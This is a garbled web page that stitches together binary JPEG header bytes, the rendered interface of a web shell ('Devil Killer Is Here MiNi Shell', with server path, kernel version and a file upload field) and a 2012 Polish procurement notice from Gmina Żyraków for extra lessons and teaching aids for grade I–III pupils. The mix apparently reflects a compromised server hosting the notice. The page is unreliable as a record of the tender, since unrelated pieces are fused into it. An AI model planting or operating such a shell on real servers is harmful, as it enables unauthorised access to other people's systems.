JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120102/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120102/1029-N-2012.html

<p class="kh_header"><b>Żyraków: Świadczenie usługi edukacyjnej w projekcie o tytule: Indywidualizacja nauczania uczniów klas I-III w gminie Żyraków</b><br>
<b>Numer ogłoszenia: 1029 - 2012; data zamieszczenia: 02.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żyraków , 39-204 Żyraków, woj. podkarpackie, tel. 014 680 71 21, faks 014 680 71 24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zyrakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi edukacyjnej w projekcie o tytule: Indywidualizacja nauczania uczniów klas I-III w gminie Żyraków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Realizacja zamówienia obejmuje świadczenie usług rozumianych jako przeprowadzanie specjalistycznych zajęć edukacyjnych wspierających indywidualizację procesu dydaktycznego, na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I - III. Celem głównym usługi jest wyrównywanie szans edukacyjnych poprzez indywidualizację procesu kształcenia dzieci klas I - III w publicznych placówkach oświatowych z terenu gminy Żyraków, tj.: Szkoła Podstawowa w Górze Motycznej, Szkoła Podstawowa w Mokrem, Szkoła Podstawowa w Nagoszynie, Szkoła Podstawowa w Straszęcinie, Szkoła Podstawowa w Woli Wielkiej, Szkoła Podstawowa w Wiewiórce i Szkoła Podstawowa w Zasowie. Cele szczegółowe projektu to: poprawa warunków materialno - technicznych w szkołach objętych wsparciem, umożliwiająca i wspomagająca indywidualną pracę nauczyciela z uczniem poprzez wyposażenie bazy szkół w niezbędne materiały dydaktyczne; zminimalizowanie specyficznych trudności w uczeniu się uczniów klas I-III w wyniku realizacji projektu dotyczącego indywidualizacji; rozwój uzdolnień u uczniów, u których zdiagnozowano określone predyspozycje. W zajęciach z beneficjentami  podniesiona zostanie i będzie respektowana  zasada równości szans kobiet i mężczyzn w życiu społecznym. Bezpośrednimi realizatorami usługi (nauczycielami w poszczególnych szkołach, zespołowo, w ramach Projektu, działającymi z ramienia Wykonawcy, mogą być osoby posiadające kwalifikacje wymagane od nauczycieli, określone w przepisach o kwalifikacjach nauczycieli, oraz umiejętności i praktykę niezbędną do prowadzenia tego typu zajęć.
2. Szczegółowy opis przedmiotu zamówienia: zespół nauczycieli, zatrudnionych przez 
Wykonawcę, stworzy program indywidualizacji (na podstawie właściwych założeń 
projektowych) obejmujący tematykę następujących edukacyjnych zajęć dodatkowych:
a. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu: ilość godzin - 630 h łącznie dla wszystkich grup, ilość grup - 13.
- SP w Góra Motyczna 2 gr. ok. 5-osobowa - 90 h,
- SP w Mokre 1 gr. 7-osobowa - 60 h,
- SP w Nagoszyn 2 gr. ok. 8-osobowa - 90 h,
- SP w Straszęcin 2 gr. ok. 10-osobowa - 60 h,
- SP w Wola Wielka 2 gr. ok. 6-7 -osobowa - 120 h,
- SP w Wiewiórka 2 gr. ok. 7-osobowa - 90 h,
- SP w Zasów 2 gr. ok. 5-osobowa - 120 h,
Termin realizacji: od stycznia 2012r. do grudnia 2012r.
b. Zajęcia logopedyczne: ilość godzin - 390 h łącznie dla wszystkich grup,ilość grup - 9.
- SP w Góra Motyczna 2 gr. ok. 3-4-osobowa - 90 h,
- SP w Mokre 3 gr. ok. 3-4- osobowa- 150h,
- SP w Straszęcin 2 gr. ok. 10-osobowa - 60 h,
- SP w Wola Wielka 2 gr. ok. 3-osobowa - 90 h,
Termin realizacji: od stycznia 2012r. do grudnia 2012r.
c. Zajęcia dla dzieci z gimnastyki korekcyjnej: ilość godzin - 360 h łącznie dla wszystkich grup, ilość grup - 8.
- SP w Góra Motyczna 2 gr. ok. 7-8-osobowa - 90 h,
- SP w Straszęcin 2 gr. ok. 7-8-osobowa - 60 h,
- SP w Wiewiórka 2 gr. ok. 8-osobowa - 90 h,
- SP w Zasów 2 gr. 8-osobowa - 120 h,
Termin realizacji: od styczeń 2012r. do grudzień 2012r.
d.Zajęcia matematyczne: ilość godzin - 360 h łącznie dla wszystkich grup,ilość grup - 8.
- SP w Mokre 1 gr. ok. 5-osobowa - 60 h,
- SP w Nagoszyn 2 gr. ok. 7-8-osobowa - 90 h,
- SP w Straszęcin 2 gr. 8-9-osobowa - 60 h,
- SP w Wola Wielka 1 gr. ok. 9 osobowa- 60h,
- SP w Wiewiórka 2 gr. ok. 8- osobowa- 90h,
Termin realizacji: od stycznia 2012r. do grudzień 2012r.
e.Zajęcia dla dzieci szczególnie uzdolnionych: ilość godzin - 170 h łącznie dla 
wszystkich grup,ilość grup - 4.
- SP w Nagoszyn 2 gr. ok. 8-osobowa - 90 h,
- SP w Straszęcin 1 gr. ok. 8-osobowa - 50 h,
- SP w Zasów 1 gr. ok. 8- osobowa- 30h.
Termin realizacji: od stycznia 2012r. do grudnia 2012r.,
Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia poinformuje 
Zamawiającego (na piśmie lub osobiście - spotkanie plenarne) o autorskim programie i koncepcji przeprowadzenia zajęć. Zamawiający odpowie na wszystkie, zadane zgodnie z ustawą pytania dotyczące środowiska danej Szkoły, aby Wykonawcy mogli zapoznać się z jej specyfiką i potrzebami edukacyjnymi w zakresie, na jaki zezwalają na to przepisy w sprawie dokumentacji przebiegu nauczania oraz ustawa o ochronie danych osobowych. 
Za wypadki i szkody powstałe podczas usługi odpowiada Wykonawca. Odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych przyjmuje na siebie Wykonawca. Wykonawca przyjmuje również odpowiedzialność finansową za prawidłowe, zgodne z projektem i wymogami Instytucji Pośredniczącej, wykonanie zadań, ich udokumentowanie i rozliczenie. Szczegółowe warunki tej odpowiedzialności ureguluje odrębna umowa o realizację zadania, zawarta pomiędzy Zlecającym, tj. Urzędem Gminy Żyraków, a Wykonawcą.Wykonawca dostarczy następujące pomoce dydaktyczne przewidziane do zakupu w budżecie projektu, na rzecz prawidłowej realizacji przedmiotu zamówienia:
(rzeczy te przeznaczone są dla dzieci ze szkół podstawowych do zajęć edukacyjnych - powinny zatem uwzględniać wiek dzieci, klasy I - III SP; powinny posiadać także 
odpowiednie atesty i certyfikaty zgodności z europejskimi normami oraz być w 100% 
bezpieczne dla dzieci - beneficjentów ostatecznych w projekcie. W związku z tym, że w budżecie projektu, w większości przypadków, są one podane z nazwy, Zamawiający na podst. art. 29 ust. 3 podaje ich nazwę własną dodając wyraz lub równoważny lub samą nazwę opisową. Pomoce dydaktyczne podane z nazwy należy traktować jako przykładowe, dopuszcza się dostarczenie materiałów o takich samych parametrach)
1. Doposażenie bazy dydaktycznej w SP Góra Motyczna:
- Materac szkolny Kształtki rehabilitacyjne (materac o wym. 200 x 120 x 6 cm, 
narożniki materaca wzmocnione trwałą tkaniną PCV) lub równoważne - 2szt,
- Karty dotykowe (16 kart dotykowych (8 par) oraz 16 kart ilustrujących wrażenia 
dotykowe, a także 2 opaski do zasłaniania oczu. Wym. kart: 9 x 9 cm.) lub równoważne - 1szt,
- Karty z obrazkami Odkryjmy pojęcie prawego i lewego lub równoważne- 1szt,
- Alfabet- zestaw literek z drewna (zestaw 56  literek ; wymiary klocka 3cm x 4cm) - 
1szt,
- Płyta CD do treningu słuchu wraz z 200 zabawami (płyta z zabawami przeznaczonymi dla dzieci w wieku od 4 do 10 lat. Płyta wraz z opisami zabaw, ilustracje, rebusy, gry potrzebne do ich przeprowadzenia oraz materiał dźwiękowy) 
- 1szt,
- Komplet Suwaki terapeutyczne (zestaw zawierający: gąsienice, tarcze, pociągi, 
windy; materiały dydaktyczne dla dzieci czytających wolno z powodu głoskowania, które uniemożliwia syntezę wyrazu; zestaw 28 kolorowych kart) lub równoważne- 4szt,
- Warsztat doskonalenia graficznego (Ilustracje ukazujące różne kształty linii, które 
wprowadzają progresję stopnia trudności: linie ukośne, linie proste długie, spirale, 
znaki literopodobne. 6 przezroczystych teczek, 30 kart o wym. 30 x 21 cm, 8 mazaków) lub równoważne - 1szt,
- Gra edukacyjna Czytam i piszę (interaktywna gra edukacyjna dla dzieci, która nauczy czytać i pisać) lub równoważne - 1szt.

2. Doposażenie bazy dydaktycznej w SP Mokre:
- Książeczka wraz z ćwiczeniami do nauki czytania i pisania Metoda 18 struktur wyrazowych lub równoważne - 1szt,
- Gra Zabawy z literami (zestaw trzech gier: Literkowy zawrót głowy, Obrazkowy wężyk, Polowanie na literki.) lub równoważne - 1szt
- Bawię się i uczę. Rebusy. (zestaw zawierający 96 dwustronnych, kolorowych kart 
formatu A5. Na pierwszej stronie każdej karty umieszczony jest rebus, a na drugiej - 
wyraz będący jego rozwiązaniem) lub równoważne - 1szt,
- Memo ortograficzne ch i h (pomoc wspomagająca rozwój operacji myślowych 
(klasyfikacji) oraz pamięci) lub równoważne - 1szt,
- Memo ortograficzne ó i u (pomoc wspomagająca rozwój operacji myślowych 
(klasyfikacji) oraz pamięci) lub równoważne - 1szt
- Memo ortograficzne rz i z (pomoc wspomagająca rozwój operacji myślowych 
(klasyfikacji) oraz pamięci) lub równoważne - 1szt
- Logico Piccolo(zestaw zawierający 51 różnych tytułów książeczek. Książeczki 
wspomagające analizę, poszukiwanie, podejmowanie decyzji) lub równoważne 
- 1szt,
- Gra logiczna Sudoku lub równoważne - 1szt,
- Mozaika XXL (250 drewnianych, kolorowych klocków w 6 kolorach) lub równoważne - 1szt,
- Gra edukacyjna Lustrzane odbicie (dwa lustra z podkładkami na dwie kostki, 
4 kostki z wzorami oraz zestaw kart) lub równoważne - 1szt,
- Kostka z niespodzianką (kostka edukacyjna, na ściankach której umieszczone są znaki działań) lub równoważne - 1szt,
- Dotknąć matematyki- zestaw do sortowania i przeliczania (Zawartość: 108 owadów, 72 robaczki, 72 żabki, figurki, Zabawa w liczenie, sortowanie 
i klasyfikowanie łatwa i przyjemna, urozmaicona i bogata w przeróżne ćwiczenia) lub 
równoważne - 1szt,
- Zestaw Elementy magnetyczne do działań matematycznych (metalowa kasetka zamykana - 30 magnetycznych krążków o śr. 2 cm (15 czerwonych - 15 niebieskich) - 62 żółte tafelki liczbowe (po 4 sztuki z zakresu 0-9, po 2 sztuki z zakresu 11-20) - 30 żółtych tafelków symboli arytmetycznych (po 6 sztuk: +, -, =, <, >) - 16 żółtych 
tafelków blanko (do własnego zapisu) - krążki i tafelki wykonane z twardej, laminowanej pianki) lub równoważne - 1szt,
- Ruchomy kalendarz (zestaw pomocy dydaktycznych zawierający: tablicę magnetyczną (70 x 50cm), magnesy: kompatybilne elementy pogodowe (19 szt.), rodzaje zajęć/aktywności (18 szt.), kolejne dni miesiąca (31szt.), liczby do układania bieżącego roku (10 szt.), fazy księżyca (8szt.), strzałki do oznaczania (2szt.), ramki do oznaczania dni świątecznych w kalendarzu (2szt.)) lub równoważne - 1szt,
- Waga klasyczna wraz z odważnikami (zawartość: waga, 11 odważników metalowych (2x1g, 2x2 g, 2x5 g, 2x10 g, 2x20 g, 1x50 g) 14 odważników z tworzywa (8x5 g, 4x10 g, 2x20 g) - 1szt,
- Lambola - linijka 100 cm magnetyczna (linijka posiadająca podziałkę centymetrową i 
decymetrową. Na spodzie podklejona jest punktowo folią magnetyczną, co ułatwia 
operowanie przyrządem na tablicy) lub równoważne - 1szt,
- Gra Głowa pełna liczb (zawartość gry: głowa z miękkiego tworzywa 3 kostki liczbowe 1-6, 3 kostki liczbowe z cyframi 0,1,2,7,8,9 klepsydra notatnik  Atrakcyjna gra matematyczna wymagająca intensywnego liczenia w pamięci. Celem gry jest utworzenie jak największej ilości prawidłowych równań do liczb wyrzuconych przez 6 kostek.) lub równoważne - 1szt,
- Domino arytmetyczne - dodawanie do 100 (10 układanek po 15 tafelków każda, wymiar tafelka 6 x 4 cm, tafelki wykonane z tworzywa) lub równoważne- 1szt,
- Domino arytmetyczne- odejmowanie do 100 ( 10 układanek po 15 tafelków każda, 
wymiar tafelka 6 x 4 cm, tafelki wykonane z tworzywa) lub równoważne- 1szt,
- Gra dydaktyczna Filip- gra dydaktyczna- cyfry i liczby (3 talie po 60 kart każda, 
łącznie 180 kart , wymiar karty 6 x 9 cm, karty wykonane z trwałej, laminowanej 
tektury każda talia posiada odrębny kolor na rewersie (co ułatwia sortowanie), 
każda talia umieszczona w odrębnym pudełeczku z przeźroczystego tworzywa, 3 drewniane kostki z oczkami 1-6) lub równoważne- 1szt,
- Gra Matematyczne łamanie głowy 2- dodawanie i odejmowanie do 30 (gra matematyczna aktywizująca liczenie w pamięci. Zastosowanie dodawanie i odejmowanie do 30. 
Zawartość: 24 dwustronne kolorowe karty 6,5 x 6,5 cm, karty wykonane są z tworzywa, instrukcja torebka z rączką) lub równoważne - 1szt,
- Ortografia i gramatyka dla smyka (cztery dydaktyczne gry planszowe przeznaczone dla dzieci w klasie 1-3. Dzięki nim zabawa stanie się nauką. Gra korygująca błędy i 
utrwalająca właściwą pisownię) lub równoważne - 1szt,
- Gra edukacyjna Zabawy z literkami lub równoważne - 1szt,
- Zestaw gier (warcaby, halma, młynek, backgammon i inne) - 1 zestaw,
3.Doposażenie bazy dydaktycznej w SP Nagoszyn :
- Laptop (waga do 3 kg, przekątna ekranu min. 15.6, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220, pamięć RAM min. 2 GB, dysk 
twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) lub równoważny - 1szt,
- Tablica szkolna z liniaturą (tablica o wymiarach: złożona - 1700 x 1000 mm, 
rozłożona - 3400 x 1000 mm, rozłożona (jednoskrzydłowo) -  2550 x 1000 m; 
powierzchnia wykonana z blachy pokrytej specjalnymi farbami tablicowymi., listwy 
boczne wykonane z profilu aluminiowego, półkola wykonane z tworzywa sztucznego, 
możliwość mocowania plansz, kartek, itp. za pomocą magnesów, mocowanie do ściany w czterech punktach) - 2szt
4.Doposażenie bazy dydaktycznej w SP Straszęcin :
- Zestaw PUS czytanie i pisanie (zestaw: 12 zestawów klocków PUS, 12 książeczek 
Królewna Śnieżka, 12 książeczek Łatwe ćwiczenia do nauki czytania cz. 1, 12 
książeczek Łatwe ćwiczenia do nauki czytania cz. 2) lub równoważne - 1 zestaw,
- Zestaw PUS matematyka I i II (zestaw: 10 zestawów klocków PUS, 18 książeczek 
Matematyka 1, 12 książeczek Matematyka 2, 1szt eduROM Wesołe miasteczko, 1szt 
Matematyka konkretna PUS, 1 szt. Matematyka na wesoło PUS) lub równoważne - 1zestaw,
- Kwestionariusz diagnozy i narzędzia badawcze w terapii pedagogicznej 
(kwestionariusze dotyczące: charakterystyki ucznia, jego zachowanie, koncentracja 
uwagi, uczciwość, stosunek do pracy i grupy, charakterystyka czynności komunikowania się, aktywność, sposób porozumiewania się, poprawność stylistyczo-gramatyczna, wady wymowy) lub równoważne - 1szt,
- Diagnoza dziecka rozpoczynającego naukę w kl. I (zadania i kryteria oceny 
umożliwiające zdiagnozowanie rozwoju dziecka w określonych obszarach funkcjonowania. Są to: podstawowe wiadomości, lateralizacja oraz orientacja w schemacie ciała, w przestrzeni i na płaszczyźnie, percepcja słuchowa, umiejętności matematyczne, czytanie) lub równoważne - 1szt,
- Diagnoza dysleksji - najważniejsze problemy (książka przedstawiająca problemy 
związane z diagnozowaniem dysleksji) lub równoważne - 1szt,
- Ryzyko dysleksji- problem i diagnozowanie książka przedstawiająca problemy 
związane z diagnozowaniem dysleksji) lub równoważne - 1szt 
- Kwestionariusz badania mowy (obrazki, których nazwy zawierają samogłoski 
i spółgłoski w trzech pozycjach, w których mogą pojawić się w wyrazie: w nagłosie, 
śródgłosie i wygłosie. Głoski występujące w nazwach obrazków ułożone są 
w kolejności zgodnej z tym jak pojawiają się w rozwoju mowy dziecka) lub równoważne - 1szt,
- Zestaw książek Gry i zabawy słuchowe wedle wyboru Wykonawcy - 1zestaw,
- Gra Turbinka (dwie plansze o różnym stopniu trudności, plastikowa baza (średnicy 
18,5 cm), śmigło, dwa opakowania z gumowymi kółkami w dwóch kolorach (20 szt. o 
średnicy 1,8 cm) lub równoważne - 1szt,
- Zestaw piórek wym. od 3 do 14 cm; 20g - 1szt,
- Drżące wiersze (wiersze poruszające tematykę bliską dziecku. Wiersze, w których 
jest wykorzystanie rytmu słów, wyrazów dźwiękonaśladowczych (onomatopei), dobór 
odpowiednich instrumentów perkusyjnych, które podkreślają muzyczny wydźwięk tekstu) lub równoważne - 1szt,
- Program nauki komunikacji u dzieci ze specyficznymi potrzebami edukacyjnymi 
(informacje i pomysły mogące być pomocne przy tworzeniu programów terapeutycznych, mających na celu naukę porozumiewania się z dzieckiem; format: 16 x 23,5 cm) lub równoważne - 1szt,
- Plansze Prawa dziecka(plansza do zawieszenia na ścianie, wskazująca najważniejsze prawa dziecka opracowane na podstawie Konwencji praw dziecka 
i przedstawione w sposób przystępny dla dzieci w młodszym wieku. Każde prawo posiada jego rozwinięcie oraz prostą ilustrację. Pomoc może służyć jako inspiracja do 
dalszych aktywności związanych z tym tematem; wym 70 x 80 cm) lub równoważne - 1szt,
- Zestaw plansz Jak odreagować własne emocje (pomoc mająca na celu wskazanie dziecku, które odczuwa smutek lub złość, sposobów na bezpieczne rozładowywanie tych emocji. 
Możliwości odreagowania smutku i złości zostały przedstawione za pomocą 
rysunków-symboli. Przyprowadzając dziecko do plakatu pomagamy mu rozpoznać odczuwane emocje, nazwać je oraz dajemy możliwość wybrania sposobu poradzenie sobie z nimi. 
Pomoc dla dzieci w wieku przedszkolnym i wczesnoszkolnym. Do planszy załączona jest krótka instrukcja dla nauczyciela, wyjaśniająca na czym polegają poszczególne metody rozładowywania wybranych emocji; wym. planszy ?68 x 48 cm) lub równoważne - 1szt,
- Ćwiczenia dla dzieci z zaburzeniami spektrum Powiedz mi co odczuwasz?(książeczka 
zawierająca ćwiczenia wspomagające opanowanie niewerbalnych zachowań komunikacyjnych i języka. Książeczka dla dzieci z zaburzeniami ze spektrum autyzmu, z afazją oraz dla dzieci dwujęzycznych; 15,5 x 21,5 cm, ; 38 kart) lub równoważne - 1szt,
- Zestaw zdjęć Emocje (zestaw zdjęć przedstawiających sposoby wyrażania różnych 
emocji. Zestaw 22 dużych zdjęć o wymiarach 21 x 15 cm. Bardzo szczegółowe 
i wyraźne, w sposób jednoznaczny obrazują stan emocjonalny bohaterów. Do ćwiczeń językowych wzbogacających słownictwo, tworzenia opowiadań, rozwijania umiejętności opisywania i wyrażania uczuć) lub równoważne - 1szt,
- Poradnik Zabawy z chustą (zbiór różnorodnych pomysłów zabaw z kolorową chustą i tunelem) lub równoważne - 1szt,
5.Doposażenie bazy dydaktycznej w SP Wola Wielka :
- Książeczka Lubię czytać ze zrozumieniem (testy zamieszczone wg uporządkowania 
zgodnie z zasadą stopniowania trudności. Dzięki temu mogą je rozwiązywać zarówno 
dzieci, którym czytanie ze zrozumieniem i wyszukiwanie w tekstach ważnych informacji sprawia trudność, jak i te, które chcą doskonalić wspomniane umiejętności) lub równoważne - 1szt
- Jak przez wiesze ortografia(książeczka, która zawiera wesołe wierszyki pomagające 
dzieciom utrwalić zasady ortograficzne. Rymowana forma utworów ułatwia ich zapamiętanie i jednocześnie wyjaśnia jak, kiedy i dlaczego stosować zasady 
prawidłowej pisowni z trudnościami ortograficznymi, rz / ż, ch / h, ó / u) lub 
równoważne - 1szt,
- Matematyka na wesoło. Zadania test 1 i 2 (pomoce, które ułatwiają wprowadzanie i 
kształtowanie nowych pojęć matematycznych; wiążą matematykę z życiem 
i przygotowują do rozwiązywania praktycznych problemów; uczą wytrwałości przy 
pokonywaniu trudności) lub równoważne - 2szt,
- Cylindry i menzurki (zestaw 7 cylindrów o pojemności 10, 25, 50, 100, 250, 500 i 
1000 ml z widocznie zaznaczoną skalą objętości. Każda menzurka posiada dzióbek 
ułatwiający wylewanie z niej odmierzonej cieczy) - 1szt,
- Gra edukacyjna typu Klik. Wyspa tajemnic lub równoważne - 1szt,
- Zadania matematyczne typu Liczę z Reksiem lub równoważne - 1szt,
- Gimnastyka buzi i języka (pomoc rozwija motorykę narządów artykulacyjnych 
- kinezę tj. ruch narządów, kinestezję tj. czucie ułożenia narządów, rozumienie mowy, wzbogaca słownictwo, stymuluje logiczne myślenie, uczy poprzez demonstrację, naśladownictwo i manipulowanie. Jedna strona karty zawiera jasny, czytelny symbol, druga strona karty jest kolorowa - jeden kolor - lub biała) lub równoważne - 1szt,
- 100 wyrazowy test artykulacyjny (zestaw, który zawiera 84 kolorowe ilustracje 
drukowane na kartonie formatu A5 laminowane; materiał obrazkowy, podręcznik, karty badań, program komputerowy, omówienie założeń teoretycznych) lub równoważne - 1szt,
- Gra dydaktyczna typu piramida logopedyczna - 2szt
- Zestaw Języczkowe przygody i inne bajeczki logopedyczne (pomoc dla logopedów, 
nauczycieli nauczania zintegrowanego oraz nauczycieli - terapeutów podczas zajęć 
grupowych i indywidualnych z dziećmi 6-7-letnimi. Ćwiczenia wplecione w treść bajek 
usprawniają artykulatory, uczące prawidłowego oddechu, kształtują słuch fonemowy) lub równoważne - 1szt,
- Zabawy logopedyczne na cztery pory roku (zbiór scenariuszy, który zawiera ćwiczenia oddechowe, usprawniające aparat artykulacyjny, ćwiczenia w naśladowaniu dźwięków otoczenia, sprzyjające prawidłowej realizacji samogłosek i spółgłosek. Scenariusze urozmaicone są ćwiczeniami wspomagającymi rozwój motoryki dużej i małej, świadomości fonologicznej, percepcji wzrokowej, pamięci 
i uwagi. Celem zajęć jest kształtowanie poprawnej wymowy, wzbogacanie słownictwa i wiedzy o środowisku oraz nauka konstruowania wypowiedzi u dzieci w wieku przedszkolnym) lub równoważne - 1szt,
- Ćwiczenia oddechowe i artykulacyjne dla najmłodszych (ćwiczenia oddechowe 
i artykulacyjne dla dzieci najmłodszych 4-7 lat. Książka zawierająca zestaw zabaw 
kształtujących prawidłowy tor oddechowy, pogłębiających oddech, usprawniających 
mięśnie języka, warg i pierścienia zwierającego gardło przedstawionych 
w atrakcyjnej dla dzieci formie) lub równoważne - 1szt,
- Testy z ćwiczeniami wspomagającymi rozwój mowy i języka dziecka (zeszyt zawierający krótkie teksty narracyjne i ćwiczenia. Treść utworów odpowiadająca zainteresowaniom młodszych dzieci szkolnych) lub równoważne - 1szt,
- Logopedyczne zabawy grupowe (zbiór zabaw logopedycznych do pracy z jednym dzieckiem i całą grupą. Ćwiczenia mogące być wykorzystane przez logopedów, terapeutów oraz nauczycieli; ułożone według zasady stopniowania trudności, mogą być przeznaczone jako cykle ćwiczeń bądź potraktowane wybiórczo) lub równoważne - 1szt,
- Książeczka 100 tekstów logopedycznych (zestaw 100 tekstów podzielonych na grupy ze względu na rodzaj dysfunkcji) lub równoważne - 1szt,
- Rymowanki, utrwalanki. Materiały do zajęć logopedycznych (materiał, który służy do utrwalania poznanych głosek, po uprzednim wyćwiczeniu ich w izolacji, sylabach, 
wyrazach i zdaniach. Zawiera rymowanki dotyczące głosek: sz, ż, cz, dż, s, z, c, dz, 
ś, ż, ć, dż, r, l, k ,ki , g , gi, t , d, p , pi, b, bi, w, wi, f, fi, ł, h. Pomoc do ćwiczenia także różnicowania głosek: sz - s, ż - z, cz - c, dż - dz, r - l, k - t, g - d, w - ł) lub równoważne - 1szt,
